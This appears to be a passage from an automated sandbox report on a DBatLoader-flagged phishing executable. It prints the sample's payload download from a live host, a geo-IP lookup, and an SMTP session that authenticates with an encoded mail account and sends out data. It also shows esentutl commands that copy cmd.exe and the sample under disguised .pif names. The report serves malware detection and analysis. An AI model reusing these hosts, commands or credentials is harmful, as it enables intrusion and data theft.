                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.94970741.185.8.2524437608C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-10 06:05:23 UTC171OUTGET /royal/233_Sdvvfamydeo HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                        Host: lwaziacademy.com
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:24 GMT
                                                                                                                                                                                                                        Content-Length: 2192512
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sat, 07 Dec 2024 07:53:23 GMT
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC8008INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 55 45 79 55 64 4a 68 55 52 45 68 67 64 48 42 51 6d 49 69 49 55 45 53 63 69 48 52 34 4f 46 79 51 53 4a 42 51 51 49 68 4d 6c 49 78 45 5a 4a 69 4d 69 4a 43 45 58 47 42 6f 67 47 78 49 55 48 52 6f 6d 44 68 51 63 46 52 77 59 45 42 73 63 46 69 49 64 48 53 63 59 46 53 51 59 49 78 41 53 48 42 4d 66 46 68 59 53 45 43 59 6d 47 68 77 66 4a 52 55 55 49 53 49 66 49 42 38 6d 44 67 38 66 46 52 63 63 4a 52 6f 6e 47 52 30 52 4a 78 6f 62 48 43 49 6b 45 69 59 55 70 71 36 6c 57 53 4f 6e 73 55 73 41 45 53 4d 6a 45 77 34 61 4a 68 45 53 48 4b 61 75 70 56 6b 6a 70 37 46 4c 70 36 61 77 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36
                                                                                                                                                                                                                        Data Ascii: pq6lWSOnsUsUEyUdJhUREhgdHBQmIiIUESciHR4OFyQSJBQQIhMlIxEZJiMiJCEXGBogGxIUHRomDhQcFRwYEBscFiIdHScYFSQYIxASHBMfFhYSECYmGhwfJRUUISIfIB8mDg8fFRccJRonGR0RJxobHCIkEiYUpq6lWSOnsUsAESMjEw4aJhESHKaupVkjp7FLp6awuLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC16384INData Raw: 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71 77 6f 4b 65 30 74 62 71 37 75 72 47 70 71 72 71 67 6f 70 2b 77 6e 62 4b 63 75 4b 53 79 6e 5a 36 66 74 62 65 6c 73 61 65 6e 70 72 43 34 73 61 43 6b 70 61 4f 34 6e 36 65 78 74 62 57 6e 70 4c 4b 31 75 4c 6d 70 6f 72 65 6c 74 36 65 72 74 61 61 77 74 71 53 63 73 62 61 31 74 37 53 69 6f 35 32 37 6e 71 57 6e 75 4a 32 78 71 61 65 66 6f 4a 2b 6a 71 35 36 66 6f 62 57 34 75 4c 4b 6a 6f 4c 65 6a 74 71 75 6c 6e 36 61 36 6f 61 47 6c 71 37 47 78 6e 5a 2b 36 73 4b 43 6e 74 4c 57 36 75 37 71 78 71 61 71 36 6f 4b 4b 66 73 4a 32 79 6e 4c 69 6b 73 70 32 65 6e 37 57 33 70 62 47 6e 70 36 61
                                                                                                                                                                                                                        Data Ascii: trW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7qwoKe0tbq7urGpqrqgop+wnbKcuKSynZ6ftbelsaenprC4saCkpaO4n6extbWnpLK1uLmporelt6ertaawtqScsba1t7Sio527nqWnuJ2xqaefoJ+jq56fobW4uLKjoLejtquln6a6oaGlq7GxnZ+6sKCntLW6u7qxqaq6oKKfsJ2ynLiksp2en7W3pbGnp6a
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC15616INData Raw: 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36 6c 70 37 69 64 73 61 6d 6e 6e 36 43 66 6f 36 75 65 6e 36 47 31 75 4c 69 79 6f 36 43 33 6f 37 61 72 70 5a 2b 6d 75 71 47 68 70 61 75 78 73 5a 32 66 75 72 43 67 70 37 53 31 75 72 75 36 73 61 6d 71 75 71 43 69 6e 37 43 64 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79 78 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71
                                                                                                                                                                                                                        Data Ascii: uLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56lp7idsamnn6Cfo6uen6G1uLiyo6C3o7arpZ+muqGhpauxsZ2furCgp7S1uru6samquqCin7Cdspy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJyxtrW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7q
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC16384INData Raw: 74 71 75 6c 6e 36 61 36 6f 61 47 6c 71 37 47 78 6e 5a 2b 36 73 4b 43 6e 74 4c 57 36 75 37 71 78 71 61 71 36 6f 4b 4b 66 73 4a 32 79 6e 4c 69 6b 73 70 32 65 6e 37 57 33 70 62 47 6e 70 36 61 77 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36 6c 70 37 69 64 73 61 6d 6e 6e 36 43 66 6f 36 75 65 6e 36 47 31 75 4c 69 79 6f 36 43 33 6f 37 61 72 70 5a 2b 6d 75 71 47 68 70 61 75 78 73 5a 32 66 75 72 43 67 70 37 53 31 75 72 75 36 73 61 6d 71 75 71 43 69 6e 37 43 64 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79
                                                                                                                                                                                                                        Data Ascii: tquln6a6oaGlq7GxnZ+6sKCntLW6u7qxqaq6oKKfsJ2ynLiksp2en7W3pbGnp6awuLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56lp7idsamnn6Cfo6uen6G1uLiyo6C3o7arpZ+muqGhpauxsZ2furCgp7S1uru6samquqCin7Cdspy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJy
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC15616INData Raw: 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71 77 6f 4b 65 30 74 62 71 37 75 72 47 70 71 72 71 67 6f 70 2b 77 6e 62 4b 63 75 4b 53 79 6e 5a 36 66 74 62 65 6c 73 61 65 6e 70 72 43 34 73 61 43 6b 70 61 4f 34 6e 36 65 78 74 62 57 6e 70 4c 4b 31 75 4c 6d 70 6f 72 65 6c 74 36 65 72 74 61 61 77 74 71 53 63 73 62 61 31 74 37 53 69 6f 35 32 37 6e 71 57 6e 75 4a 32 78 71 61 65 66 6f 4a 2b 6a 71 35 36 66 6f 62 57 34 75 4c 4b 6a 6f 4c 65 6a 74 71 75 6c 6e 36 61 36 6f 61 47 6c 71 37 47 78 6e 5a 2b 36 73 4b 43 6e 74 4c 57 36 75 37 71 78 71 61 71 36 6f 4b 4b 66 73 4a 32 79 6e 4c 69 6b 73 70 32 65 6e 37 57 33 70 62 47 6e 70 36 61
                                                                                                                                                                                                                        Data Ascii: trW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7qwoKe0tbq7urGpqrqgop+wnbKcuKSynZ6ftbelsaenprC4saCkpaO4n6extbWnpLK1uLmporelt6ertaawtqScsba1t7Sio527nqWnuJ2xqaefoJ+jq56fobW4uLKjoLejtquln6a6oaGlq7GxnZ+6sKCntLW6u7qxqaq6oKKfsJ2ynLiksp2en7W3pbGnp6a
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC16000INData Raw: 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79 78 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71 77 6f 4b 65 30 74 62 71 37 75 72 47 70 71 72 71 67 6f 70 2b 77 6e 62 4b 63 75 4b 53 79 6e 5a 36 66 74 62 65 6c 73 61 65 6e 70 72 43 34 73 61 43 6b 70 61 4f 34 6e 36 65 78 74 62 57 6e 70 4c 4b 31 75 4c 6d 70 6f 72 65 6c 74 36 65 72 74 61 61 77 74 71 53 63 73 62 61 31 74 37 53 69 6f 35 32 37 6e 71 57 6e 75 4a 32 78 71 61 65 66 6f 4a 2b 6a 71 35 36 66 6f 62 57 34 75 4c 4b 6a 6f 4c 65
                                                                                                                                                                                                                        Data Ascii: spy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJyxtrW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7qwoKe0tbq7urGpqrqgop+wnbKcuKSynZ6ftbelsaenprC4saCkpaO4n6extbWnpLK1uLmporelt6ertaawtqScsba1t7Sio527nqWnuJ2xqaefoJ+jq56fobW4uLKjoLe
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC16000INData Raw: 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36 6c 70 37 69 64 73 61 6d 6e 6e 36 43 66 6f 36 75 65 6e 36 47 31 75 4c 69 79 6f 36 43 33 6f 37 61 72 70 5a 2b 6d 75 71 47 68 70 61 75 78 73 5a 32 66 75 72 43 67 70 37 53 31 75 72 75 36 73 61 6d 71 75 71 43 69 6e 37 43 64 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79 78 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71
                                                                                                                                                                                                                        Data Ascii: uLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56lp7idsamnn6Cfo6uen6G1uLiyo6C3o7arpZ+muqGhpauxsZ2furCgp7S1uru6samquqCin7Cdspy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJyxtrW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7q
                                                                                                                                                                                                                        2024-12-10 06:05:24 UTC16384INData Raw: 75 4c 6d 70 6f 72 65 6c 74 36 65 72 74 61 61 77 74 71 53 63 73 62 61 31 74 37 53 69 6f 35 32 37 6e 71 57 6e 75 4a 32 78 71 61 65 66 6f 4a 2b 6a 71 35 36 66 6f 62 57 34 75 4c 4b 6a 6f 4c 65 6a 74 71 75 6c 6e 36 61 36 6f 61 47 6c 71 37 47 78 6e 5a 2b 36 73 4b 43 6e 74 4c 57 36 75 37 71 78 71 61 71 36 6f 4b 4b 66 73 4a 32 79 6e 4c 69 6b 73 70 32 65 6e 37 57 33 70 62 47 6e 70 36 61 77 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36 6c 70 37 69 64 73 61 6d 6e 6e 36 43 66 6f 36 75 65 6e 36 47 31 75 4c 69 79 6f 36 43 33 6f 37 61 72 70 5a 2b 6d 75 71 47 68 70 61 75 78 73 5a 32 66 75 72 43 67 70 37 53 31 75 72 75 36 73 61 6d 71 75 71 43 69 6e 37 43
                                                                                                                                                                                                                        Data Ascii: uLmporelt6ertaawtqScsba1t7Sio527nqWnuJ2xqaefoJ+jq56fobW4uLKjoLejtquln6a6oaGlq7GxnZ+6sKCntLW6u7qxqaq6oKKfsJ2ynLiksp2en7W3pbGnp6awuLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56lp7idsamnn6Cfo6uen6G1uLiyo6C3o7arpZ+muqGhpauxsZ2furCgp7S1uru6samquqCin7C
                                                                                                                                                                                                                        2024-12-10 06:05:25 UTC16384INData Raw: 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79 78 74 72 57 33 74 4b 4b 6a 6e 62 75 65 70 61 65 34 6e 62 47 70 70 35 2b 67 6e 36 4f 72 6e 70 2b 68 74 62 69 34 73 71 4f 67 74 36 4f 32 71 36 57 66 70 72 71 68 6f 61 57 72 73 62 47 64 6e 37 71 77 6f 4b 65 30 74 62 71 37 75 72 47 70 71 72 71 67 6f 70 2b 77 6e 62 4b 63 75 4b 53 79 6e 5a 36 66 74 62 65 6c 73 61 65 6e 70 72 43 34 73 61 43 6b 70 61 4f 34 6e 36 65 78 74 62 57 6e 70 4c 4b 31 75 4c 6d 70 6f 72 65 6c 74 36 65 72 74 61 61 77 74 71 53 63 73 62 61 31 74 37 53 69 6f 35 32 37 6e 71 57 6e 75 4a 32 78 71 61 65 66 6f 4a 2b 6a 71 35 36 66 6f 62 57 34 75 4c 4b 6a 6f 4c 65
                                                                                                                                                                                                                        Data Ascii: spy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJyxtrW3tKKjnbuepae4nbGpp5+gn6Ornp+htbi4sqOgt6O2q6WfprqhoaWrsbGdn7qwoKe0tbq7urGpqrqgop+wnbKcuKSynZ6ftbelsaenprC4saCkpaO4n6extbWnpLK1uLmporelt6ertaawtqScsba1t7Sio527nqWnuJ2xqaefoJ+jq56fobW4uLKjoLe
                                                                                                                                                                                                                        2024-12-10 06:05:25 UTC16384INData Raw: 74 71 75 6c 6e 36 61 36 6f 61 47 6c 71 37 47 78 6e 5a 2b 36 73 4b 43 6e 74 4c 57 36 75 37 71 78 71 61 71 36 6f 4b 4b 66 73 4a 32 79 6e 4c 69 6b 73 70 32 65 6e 37 57 33 70 62 47 6e 70 36 61 77 75 4c 47 67 70 4b 57 6a 75 4a 2b 6e 73 62 57 31 70 36 53 79 74 62 69 35 71 61 4b 33 70 62 65 6e 71 37 57 6d 73 4c 61 6b 6e 4c 47 32 74 62 65 30 6f 71 4f 64 75 35 36 6c 70 37 69 64 73 61 6d 6e 6e 36 43 66 6f 36 75 65 6e 36 47 31 75 4c 69 79 6f 36 43 33 6f 37 61 72 70 5a 2b 6d 75 71 47 68 70 61 75 78 73 5a 32 66 75 72 43 67 70 37 53 31 75 72 75 36 73 61 6d 71 75 71 43 69 6e 37 43 64 73 70 79 34 70 4c 4b 64 6e 70 2b 31 74 36 57 78 70 36 65 6d 73 4c 69 78 6f 4b 53 6c 6f 37 69 66 70 37 47 31 74 61 65 6b 73 72 57 34 75 61 6d 69 74 36 57 33 70 36 75 31 70 72 43 32 70 4a 79
                                                                                                                                                                                                                        Data Ascii: tquln6a6oaGlq7GxnZ+6sKCntLW6u7qxqaq6oKKfsJ2ynLiksp2en7W3pbGnp6awuLGgpKWjuJ+nsbW1p6Sytbi5qaK3pbenq7WmsLaknLG2tbe0oqOdu56lp7idsamnn6Cfo6uen6G1uLiyo6C3o7arpZ+muqGhpauxsZ2furCgp7S1uru6samquqCin7Cdspy4pLKdnp+1t6Wxp6emsLixoKSlo7ifp7G1taeksrW4uamit6W3p6u1prC2pJy


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.949712104.21.67.1524437996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-10 06:05:38 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-12-10 06:05:38 UTC874INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:38 GMT
                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 688161
                                                                                                                                                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xb%2FBRmuWx7TOy6AMLgUxDqkdtamfZDxbkoRSY4HAWCXXvvi6AxJQcEWxcKxCkGAMMGg4kqkCwcVqY3gWatc0skv0SVnEAeivob186MCEMaptDCofOOWjyRGLVY%2BTo7Tt0l3TD0DZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8efb0b5a1b3a42cd-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1718&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1643218&cwnd=241&unsent_bytes=0&cid=3b81f69f6ce4e57f&ts=457&x=0"
                                                                                                                                                                                                                        2024-12-10 06:05:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                                                        SMTP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.390676022 CET58749725103.20.200.105192.168.2.9220-cp-wc15.syd02.ds.network ESMTP Exim 4.96.2 #2 Tue, 10 Dec 2024 17:05:48 +1100
                                                                                                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.390891075 CET49725587192.168.2.9103.20.200.105EHLO 172892
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.924350023 CET58749725103.20.200.105192.168.2.9250-cp-wc15.syd02.ds.network Hello 172892 [8.46.123.228]
                                                                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.925425053 CET49725587192.168.2.9103.20.200.105AUTH login aGVsbG9AdGhlbWF0bWFuLmNvbS5hdQ==
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.446821928 CET58749725103.20.200.105192.168.2.9334 UGFzc3dvcmQ6
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.992284060 CET58749725103.20.200.105192.168.2.9235 Authentication succeeded
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.992652893 CET49725587192.168.2.9103.20.200.105MAIL FROM:<hello@thematman.com.au>
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.512968063 CET58749725103.20.200.105192.168.2.9250 OK
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.513339043 CET49725587192.168.2.9103.20.200.105RCPT TO:<joyal005@yahoo.com>
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033073902 CET58749725103.20.200.105192.168.2.9250 Accepted
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033217907 CET49725587192.168.2.9103.20.200.105DATA
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.553322077 CET58749725103.20.200.105192.168.2.9354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554318905 CET49725587192.168.2.9103.20.200.105.
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.330883026 CET58749725103.20.200.105192.168.2.9250 OK id=1tKtNX-007pEZ-0v

                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:01:05:17
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:1'264'128 bytes
                                                                                                                                                                                                                        MD5 hash:CBEEA46A413D2F3D7166104D79788062
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:01:05:30
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" "
                                                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:01:05:30
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:01:05:31
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:01:05:32
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o
                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
